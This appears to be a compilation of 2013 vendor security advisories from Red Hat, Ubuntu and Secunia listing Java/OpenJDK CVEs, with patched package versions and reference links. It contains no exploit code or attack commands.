865568 - CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
867185 - CVE-2012-1531 Oracle JDK: unspecified vulnerability (2D)
867186 - CVE-2012-1532 Oracle JDK: unspecified vulnerability (Deployment)
867187 - CVE-2012-1533 Oracle JDK: unspecified vulnerability (Deployment)
867189 - CVE-2012-3143 Oracle JDK: unspecified vulnerability (JMX)
867190 - CVE-2012-3159 Oracle JDK: unspecified vulnerability (Deployment)
867193 - CVE-2012-5083 Oracle JDK: unspecified vulnerability (2D)
876386 - CVE-2012-4820 IBM JDK: java.lang.reflect.Method invoke() code execution
876388 - CVE-2012-4822 IBM JDK: java.lang.class code execution
876389 - CVE-2012-4823 IBM JDK: java.lang.ClassLoder defineClass() code execution
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)
913014 - CVE-2013-1486 OpenJDK: MBeanServer insufficient privilege restrictions (JMX, 8006446)
913030 - CVE-2013-1487 Oracle JDK: unspecified vulnerability fixed in 6u41 and 7u15 (Deployment)
917550 - CVE-2013-0809 OpenJDK: Specially crafted sample model integer overflow (2D, 8007014)
917553 - CVE-2013-1493 OpenJDK: CMM malformed raster memory corruption (2D, 8007675)
920245 - CVE-2013-0401 OpenJDK: sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly invoke the system class loader (CanSecWest 2013, AWT, 8009305)
920248 - CVE-2013-1491 Oracle JDK: unspecified sanbox bypass (CanSecWest 2013, 2D)
952387 - CVE-2013-1537 OpenJDK: remote code loading enabled by default (RMI, 8001040)
952509 - CVE-2013-2424 OpenJDK: MBeanInstantiator insufficient class access checks (JMX, 8006435)
952521 - CVE-2013-2429 OpenJDK: JPEGImageWriter state corruption (ImageIO, 8007918)
952524 - CVE-2013-2430 OpenJDK: JPEGImageReader state corruption (ImageIO, 8007667)
952638 - CVE-2013-2420 OpenJDK: image processing vulnerability (2D, 8007617)
952642 - CVE-2013-2422 OpenJDK: MethodUtil trampoline class incorrect restrictions (Libraries, 8009857)
952648 - CVE-2013-1557 OpenJDK: LogStream.setDefaultStream() missing security restrictions (RMI, 8001329)
952656 - CVE-2013-2419 ICU: Layout Engine font processing errors (JDK 2D, 8001031)
952657 - CVE-2013-2417 OpenJDK: Network InetAddress serialization information disclosure (Networking, 8000724)
952708 - CVE-2013-2383 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004986)
952709 - CVE-2013-2384 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004987)
952711 - CVE-2013-1569 ICU: Layout Engine font layout and glyph table errors (JDK 2D, 8004994)
953166 - CVE-2013-1540 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953172 - CVE-2013-1563 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Install)
953265 - CVE-2013-2394 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)
953267 - CVE-2013-2418 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953269 - CVE-2013-2432 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (2D)
953270 - CVE-2013-2433 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953273 - CVE-2013-2435 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
953275 - CVE-2013-2440 Oracle JDK: unspecified vulnerability fixed in 7u21 and 6u45 (Deployment)
973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375)
975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243)
975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248)
975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253)
975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257)
975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438)
975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597)
975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601)
975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071)
975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328)
975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744)
975129 - CVE-2013-2454 OpenJDK: SerialJavaObject package restriction (JDBC, 8009554)
975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038)
975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642)
975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120)
975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124)
975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330)
975138 - CVE-2013-2452 OpenJDK: Unique VMIDs (Libraries, 8001033)
975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812)
975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318)
975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638)
975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132)
975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703)
975146 - CVE-2013-2451 OpenJDK: exclusive port binding (Networking, 7170730)
975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)
975757 - CVE-2013-2464 Oracle JDK: unspecified vulnerability fixed in 7u25 (2D)
975761 - CVE-2013-2468 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)
975764 - CVE-2013-2466 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)
975767 - CVE-2013-3743 Oracle JDK: unspecified vulnerability fixed in 6u51 and 5u51 (AWT)
975770 - CVE-2013-2442 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)
975773 - CVE-2013-2437 Oracle JDK: unspecified vulnerability fixed in 7u25 (Deployment)
6. Package List:
Red Hat Satellite 5.4 (RHEL v.5):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.src.rpm
i386:
java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.i386.rpm
java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.i386.rpm
s390x:
java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.s390x.rpm
java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.s390x.rpm
x86_64:
java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el5_9.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el5_9.x86_64.rpm
Red Hat Satellite 5.4 (RHEL v.6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/RHNSAT/SRPMS/java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.src.rpm
s390x:
java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.s390x.rpm
java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el6_4.s390x.rpm
x86_64:
java-1.6.0-ibm-1.6.0.14.0-1jpp.1.el6_4.x86_64.rpm
java-1.6.0-ibm-devel-1.6.0.14.0-1jpp.1.el6_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-0802.html
https://www.redhat.com/security/data/cve/CVE-2011-0814.html
https://www.redhat.com/security/data/cve/CVE-2011-0862.html
https://www.redhat.com/security/data/cve/CVE-2011-0863.html
https://www.redhat.com/security/data/cve/CVE-2011-0865.html
https://www.redhat.com/security/data/cve/CVE-2011-0867.html
https://www.redhat.com/security/data/cve/CVE-2011-0868.html
https://www.redhat.com/security/data/cve/CVE-2011-0869.html
https://www.redhat.com/security/data/cve/CVE-2011-0871.html
https://www.redhat.com/security/data/cve/CVE-2011-0873.html
https://www.redhat.com/security/data/cve/CVE-2011-3389.html
https://www.redhat.com/security/data/cve/CVE-2011-3516.html
https://www.redhat.com/security/data/cve/CVE-2011-3521.html
https://www.redhat.com/security/data/cve/CVE-2011-3544.html
https://www.redhat.com/security/data/cve/CVE-2011-3545.html
https://www.redhat.com/security/data/cve/CVE-2011-3546.html
https://www.redhat.com/security/data/cve/CVE-2011-3547.html
https://www.redhat.com/security/data/cve/CVE-2011-3548.html
https://www.redhat.com/security/data/cve/CVE-2011-3549.html
https://www.redhat.com/security/data/cve/CVE-2011-3550.html
https://www.redhat.com/security/data/cve/CVE-2011-3551.html
https://www.redhat.com/security/data/cve/CVE-2011-3552.html
https://www.redhat.com/security/data/cve/CVE-2011-3553.html
https://www.redhat.com/security/data/cve/CVE-2011-3554.html
https://www.redhat.com/security/data/cve/CVE-2011-3556.html
https://www.redhat.com/security/data/cve/CVE-2011-3557.html
https://www.redhat.com/security/data/cve/CVE-2011-3560.html
https://www.redhat.com/security/data/cve/CVE-2011-3561.html
https://www.redhat.com/security/data/cve/CVE-2011-3563.html
https://www.redhat.com/security/data/cve/CVE-2011-5035.html
https://www.redhat.com/security/data/cve/CVE-2012-0497.html
https://www.redhat.com/security/data/cve/CVE-2012-0498.html
https://www.redhat.com/security/data/cve/CVE-2012-0499.html
https://www.redhat.com/security/data/cve/CVE-2012-0500.html
https://www.redhat.com/security/data/cve/CVE-2012-0501.html
https://www.redhat.com/security/data/cve/CVE-2012-0502.html
https://www.redhat.com/security/data/cve/CVE-2012-0503.html
https://www.redhat.com/security/data/cve/CVE-2012-0505.html
https://www.redhat.com/security/data/cve/CVE-2012-0506.html
https://www.redhat.com/security/data/cve/CVE-2012-0507.html
https://www.redhat.com/security/data/cve/CVE-2012-0547.html
https://www.redhat.com/security/data/cve/CVE-2012-0551.html
https://www.redhat.com/security/data/cve/CVE-2012-1531.html
https://www.redhat.com/security/data/cve/CVE-2012-1532.html
https://www.redhat.com/security/data/cve/CVE-2012-1533.html
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-1682.html
https://www.redhat.com/security/data/cve/CVE-2012-1713.html
https://www.redhat.com/security/data/cve/CVE-2012-1716.html
https://www.redhat.com/security/data/cve/CVE-2012-1717.html
https://www.redhat.com/security/data/cve/CVE-2012-1718.html
https://www.redhat.com/security/data/cve/CVE-2012-1719.html
https://www.redhat.com/security/data/cve/CVE-2012-1721.html
https://www.redhat.com/security/data/cve/CVE-2012-1722.html
https://www.redhat.com/security/data/cve/CVE-2012-1725.html
https://www.redhat.com/security/data/cve/CVE-2012-3143.html
https://www.redhat.com/security/data/cve/CVE-2012-3159.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3216.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2012-4820.html
https://www.redhat.com/security/data/cve/CVE-2012-4822.html
https://www.redhat.com/security/data/cve/CVE-2012-4823.html
https://www.redhat.com/security/data/cve/CVE-2012-5068.html
https://www.redhat.com/security/data/cve/CVE-2012-5069.html
https://www.redhat.com/security/data/cve/CVE-2012-5071.html
https://www.redhat.com/security/data/cve/CVE-2012-5072.html
https://www.redhat.com/security/data/cve/CVE-2012-5073.html
https://www.redhat.com/security/data/cve/CVE-2012-5075.html
https://www.redhat.com/security/data/cve/CVE-2012-5079.html
https://www.redhat.com/security/data/cve/CVE-2012-5081.html
https://www.redhat.com/security/data/cve/CVE-2012-5083.html
https://www.redhat.com/security/data/cve/CVE-2012-5084.html
https://www.redhat.com/security/data/cve/CVE-2012-5089.html
https://www.redhat.com/security/data/cve/CVE-2013-0169.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0401.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-0809.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1481.html
https://www.redhat.com/security/data/cve/CVE-2013-1486.html
https://www.redhat.com/security/data/cve/CVE-2013-1487.html
https://www.redhat.com/security/data/cve/CVE-2013-1491.html
https://www.redhat.com/security/data/cve/CVE-2013-1493.html
https://www.redhat.com/security/data/cve/CVE-2013-1500.html
https://www.redhat.com/security/data/cve/CVE-2013-1537.html
https://www.redhat.com/security/data/cve/CVE-2013-1540.html
https://www.redhat.com/security/data/cve/CVE-2013-1557.html
https://www.redhat.com/security/data/cve/CVE-2013-1563.html
https://www.redhat.com/security/data/cve/CVE-2013-1569.html
https://www.redhat.com/security/data/cve/CVE-2013-1571.html
https://www.redhat.com/security/data/cve/CVE-2013-2383.html
https://www.redhat.com/security/data/cve/CVE-2013-2384.html
https://www.redhat.com/security/data/cve/CVE-2013-2394.html
https://www.redhat.com/security/data/cve/CVE-2013-2407.html
https://www.redhat.com/security/data/cve/CVE-2013-2412.html
https://www.redhat.com/security/data/cve/CVE-2013-2417.html
https://www.redhat.com/security/data/cve/CVE-2013-2418.html
https://www.redhat.com/security/data/cve/CVE-2013-2419.html
https://www.redhat.com/security/data/cve/CVE-2013-2420.html
https://www.redhat.com/security/data/cve/CVE-2013-2422.html
https://www.redhat.com/security/data/cve/CVE-2013-2424.html
https://www.redhat.com/security/data/cve/CVE-2013-2429.html
https://www.redhat.com/security/data/cve/CVE-2013-2430.html
https://www.redhat.com/security/data/cve/CVE-2013-2432.html
https://www.redhat.com/security/data/cve/CVE-2013-2433.html
https://www.redhat.com/security/data/cve/CVE-2013-2435.html
https://www.redhat.com/security/data/cve/CVE-2013-2437.html
https://www.redhat.com/security/data/cve/CVE-2013-2440.html
https://www.redhat.com/security/data/cve/CVE-2013-2442.html
https://www.redhat.com/security/data/cve/CVE-2013-2443.html
https://www.redhat.com/security/data/cve/CVE-2013-2444.html
https://www.redhat.com/security/data/cve/CVE-2013-2446.html
https://www.redhat.com/security/data/cve/CVE-2013-2447.html
https://www.redhat.com/security/data/cve/CVE-2013-2448.html
https://www.redhat.com/security/data/cve/CVE-2013-2450.html
https://www.redhat.com/security/data/cve/CVE-2013-2451.html
https://www.redhat.com/security/data/cve/CVE-2013-2452.html
https://www.redhat.com/security/data/cve/CVE-2013-2453.html
https://www.redhat.com/security/data/cve/CVE-2013-2454.html
https://www.redhat.com/security/data/cve/CVE-2013-2455.html
https://www.redhat.com/security/data/cve/CVE-2013-2456.html
https://www.redhat.com/security/data/cve/CVE-2013-2457.html
https://www.redhat.com/security/data/cve/CVE-2013-2459.html
https://www.redhat.com/security/data/cve/CVE-2013-2463.html
https://www.redhat.com/security/data/cve/CVE-2013-2464.html
https://www.redhat.com/security/data/cve/CVE-2013-2465.html
https://www.redhat.com/security/data/cve/CVE-2013-2466.html
https://www.redhat.com/security/data/cve/CVE-2013-2468.html
https://www.redhat.com/security/data/cve/CVE-2013-2469.html
https://www.redhat.com/security/data/cve/CVE-2013-2470.html
https://www.redhat.com/security/data/cve/CVE-2013-2471.html
https://www.redhat.com/security/data/cve/CVE-2013-2472.html
https://www.redhat.com/security/data/cve/CVE-2013-2473.html
https://www.redhat.com/security/data/cve/CVE-2013-3743.html
https://access.redhat.com/security/updates/classification/#low
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFSZ/v5XlSAg2UNWIIRAsEBAKCkmjlhUy0YBafaRQhQiomriK+mYACfVSqy
yJ2NIMe3T4TlQKxpvQoCAIA=
=i9I6
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ============================================================================
Ubuntu Security Notice USN-1724-1
February 14, 2013
openjdk-6, openjdk-7 vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 11.10
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in OpenJDK.
Software Description:
- openjdk-7: Open Source Java implementation
- openjdk-6: Open Source Java implementation
Details:
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. An attacker could exploit these
to cause a denial of service. (CVE-2012-1541, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0446, CVE-2012-3213, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0441,
CVE-2013-0442, CVE-2013-0445, CVE-2013-0450, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480)
Vulnerabilities were discovered in the OpenJDK JRE related to information
disclosure. (CVE-2013-0409, CVE-2013-0434, CVE-2013-0438)
Several data integrity vulnerabilities were discovered in the OpenJDK JRE.
(CVE-2013-0424, CVE-2013-0427, CVE-2013-0433, CVE-2013-1473)
Several vulnerabilities were discovered in the OpenJDK JRE related to
information disclosure and data integrity. (CVE-2013-0432, CVE-2013-0435,
CVE-2013-0443)
A vulnerability was discovered in the OpenJDK JRE related to availability.
An attacker could exploit this to cause a denial of service.
(CVE-2013-0440)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. This issue only affected Ubuntu 12.10. (CVE-2013-0444)
A data integrity vulnerability was discovered in the OpenJDK JRE. This
issue only affected Ubuntu 12.10. (CVE-2013-0448)
An information disclosure vulnerability was discovered in the OpenJDK JRE.
This issue only affected Ubuntu 12.10. (CVE-2013-0449)
A vulnerability was discovered in the OpenJDK JRE related to information
disclosure and data integrity. An attacker could exploit this to cause a
denial of service. (CVE-2013-1481)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.10:
icedtea-7-jre-jamvm 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-headless 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-lib 7u13-2.3.6-0ubuntu0.12.10.1
openjdk-7-jre-zero 7u13-2.3.6-0ubuntu0.12.10.1
Ubuntu 12.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.12.04.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.12.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.12.04.2
Ubuntu 11.10:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.11.10.2
icedtea-6-jre-jamvm 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.11.10.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.11.10.2
Ubuntu 10.04 LTS:
icedtea-6-jre-cacao 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-headless 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-lib 6b27-1.12.1-2ubuntu0.10.04.2
openjdk-6-jre-zero 6b27-1.12.1-2ubuntu0.10.04.2
This update uses a new upstream release which includes additional bug
fixes. After a standard system update you need to restart any Java
applications or applets to make all the necessary changes.
Download and install the updates from The HP Software Support Online (SSO). ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
